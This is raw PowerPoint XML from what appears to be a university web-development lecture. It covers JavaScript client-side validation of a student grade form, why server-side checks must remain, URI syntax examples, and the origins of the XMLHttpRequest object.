          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>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29900" y="710851"/>
            <a:ext cx="3725955" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form_validation_regular.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463215" y="2693415"/>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2463215" y="3067385"/>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729900" y="2211927"/>
            <a:ext cx="3725955" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>empty class field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2463215" y="3713003"/>
            <a:ext cx="5092856" cy="855458"/>
            <a:chOff x="2463215" y="710851"/>
            <a:chExt cx="5092856" cy="855458"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Arrow Connector 36"/>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729900" y="710851"/>
              <a:ext cx="3725955" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                </a:rPr>
                <a:t>wrong grade format</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2463215" y="5214079"/>
            <a:ext cx="5092856" cy="855458"/>
            <a:chOff x="2463215" y="710851"/>
            <a:chExt cx="5092856" cy="855458"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Arrow Connector 40"/>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29900" y="710851"/>
              <a:ext cx="3725955" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                </a:rPr>
                <a:t>correct submission</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4264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JavaScript Uses – Form Validation</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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>check_form</a:t>
            </a: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form = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>the_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form.student.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> == "" || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form.class.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> == "" || form["grade"].value == ""){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  alert("Error, must fill out all the form");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  return false;</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grade = form["grade"].value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   if (!(grade == 'A' || grade == 'B' || grade == 'C' || </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>         grade == 'D' || grade == 'F')) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  alert("Error, grade must be one of A, B, C, D, or F");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  return false;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   return true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>the_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>check_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  Student: &lt;input type="text" name="student"&gt;&lt;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Class:  &lt;input type="text" name="class"&gt;&lt;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Grade:  &lt;input type="text" name="grade"&gt;&lt;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&lt;input type="submit" name="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84456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38.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18435565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9 at 10.3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76022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a:t>URI – Syntax </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;scheme&gt;:&lt;authority&gt;/&lt;path&gt;?&lt;query&gt;#&lt;fragment&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo://example.com:8042/over/there?test=bar#nose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp://ftp.ietf.org/rfc/rfc1808.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mailto:doupe@asu.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>https://example.com/test/example:1.html?/adam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291506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29 at 10.3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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screen Shot 2015-01-29 at 10.43.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71" y="1714500"/>
            <a:ext cx="4820557" cy="2401218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16618790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1-29 at 10.4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157" y="1439349"/>
            <a:ext cx="4811486" cy="2396699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screen Shot 2015-01-29 at 10.44.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10284434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29 at 10.44.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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2015-01-29 at 10.4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7" y="1439349"/>
            <a:ext cx="4811486" cy="2396699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21012781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29 at 10.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0"/>
            <a:ext cx="7724274" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8132249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6071" y="760287"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1035821"/>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1183707"/>
            <a:ext cx="810980" cy="720420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>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729900" y="710851"/>
            <a:ext cx="3725955" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form_validation_js.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2463215" y="1904127"/>
            <a:ext cx="5092856" cy="855458"/>
            <a:chOff x="2463215" y="710851"/>
            <a:chExt cx="5092856" cy="855458"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Arrow Connector 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2463215" y="119233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2463215" y="1566309"/>
              <a:ext cx="509285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729900" y="710851"/>
              <a:ext cx="3725955" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                </a:rPr>
                <a:t>correct submission</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12850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Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now that we're doing validation on the client, can we get rid of all those PHP checks in our server-side code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No guarantee that client-side validation is performed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User disables JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command-line clients (Assignment 1 Part 2, curl)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Otherwise, users could enter arbitrary data that does not conform to your validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could lead to a security compromise or not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So the validation must remain on the server-side and the client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brings up another problem, how to perform consist validation when server-side and client-side written in different languages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186994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XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft developers working on Outlook Web Access for Exchange 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An example is http://ex2010.asu.edu/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scalability problems with traditional web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They created a DHTML version (circa) 1998 using an ActiveX control to fetch bits of data from the server using JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWA team got the MSXML team (MSXML is Microsoft's XML library, and it shipped with IE) to include their ActiveX control (hence the XML in the name)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shipped in IE 5, March 1999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exchange 2000 finally released in November 2000, and OWA used the ActiveX Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Added by Netscape in December 2000 as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the full story here: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.alexhopmann.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/story-of-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmlhttp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7855857" y="130628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6881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XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Allows JavaScript code to (asynchronously) retrieve data from the server, then process the data and update the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Because of the origin (ActiveX control on windows and included in Netscape's DOM), used to need two different ways to instantiate the control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Most browsers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Internet Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
